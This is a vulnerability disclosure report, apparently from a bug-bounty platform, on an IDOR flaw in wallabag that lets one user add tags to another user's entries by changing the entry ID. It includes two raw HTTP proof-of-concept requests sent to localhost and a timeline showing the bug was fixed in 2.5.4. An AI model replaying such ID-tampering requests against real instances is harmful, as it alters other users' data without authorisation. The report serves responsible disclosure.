IDOR Vulnerability Allows add tag entry user other in wallabag/wallabag

Valid

Reported on

Feb 3rd 2023


Description

IDOR Vulnerability Allows add tag entry user other, allows adding tags to any user, since there is no user authentication. And not limiting the input causes the entry interface to break

Proof of Concept

Step 1. User A manages entry id 6

Step 2. User B manages entry id 7

Step 3. Login user A, add tag for this user entry

eg: demo user A

POST /new-tag/6 HTTP/1.1
Host: localhost
Content-Length: 85
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/view/6
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: security_level=0; PHPSESSID=55d2bbe519f7c1f342384481e630a78a; REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpaSFY1YkdzPToxNzA2OTQxNTMzOjk3YmY0ZDdmYzFjNzQwZTdiMzZjYWEzOGM5ZjA1MzhjMTlkOTNiMGM0NjgzN2MwOTIzM2NhNGIxZGU4N2FmYWI%3D
Connection: close

tag[label]=demoidor&tag[add]=&tag[_token]=Zqf_ZVhMZ9bUpJaC-y3kbskI1GtKRuIs5mWOqogaAVM

Step 4. Change the ID to 7, now you can add a tag to the user's entry

POST /new-tag/7 HTTP/1.1
Host: localhost
Content-Length: 85
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/view/6
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: security_level=0; PHPSESSID=55d2bbe519f7c1f342384481e630a78a; REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpaSFY1YkdzPToxNzA2OTQxNTMzOjk3YmY0ZDdmYzFjNzQwZTdiMzZjYWEzOGM5ZjA1MzhjMTlkOTNiMGM0NjgzN2MwOTIzM2NhNGIxZGU4N2FmYWI%3D
Connection: close

tag[label]=demoidor&tag[add]=&tag[_token]=Zqf_ZVhMZ9bUpJaC-y3kbskI1GtKRuIs5mWOqogaAVM

Step 5. Input value is not limited, then input character > 200 makes the interface broken

Impact

an attacker add tag by user other, interface broken

References

We are processing your report and will contact the wallabag team within 24 hours. a year ago
We have contacted a member of the wallabag team and are waiting to hear back a year ago
wallabag/wallabag maintainer has acknowledged this report a year ago
Jérémy Benoist validated this vulnerability a year ago
juylang has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Jérémy Benoist marked this as fixed in 2.5.4 with commit acd285 a year ago
Jérémy Benoist has been awarded the fix bounty
This vulnerability has now been published a year ago
wallabag/wallabag maintainer gave praise a year ago
Thank you @juylang !
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Juy Lang
a year ago

Researcher


I see the CVE has not been assigned. Please help me!!

Ben Harvie
a year ago

Admin


Hey, it looks like our system bugged and your CVE was stuck in an assigned state, we have now published the CVE, please allow some time for Mitre to update it on their side. Thanks!

to join this conversation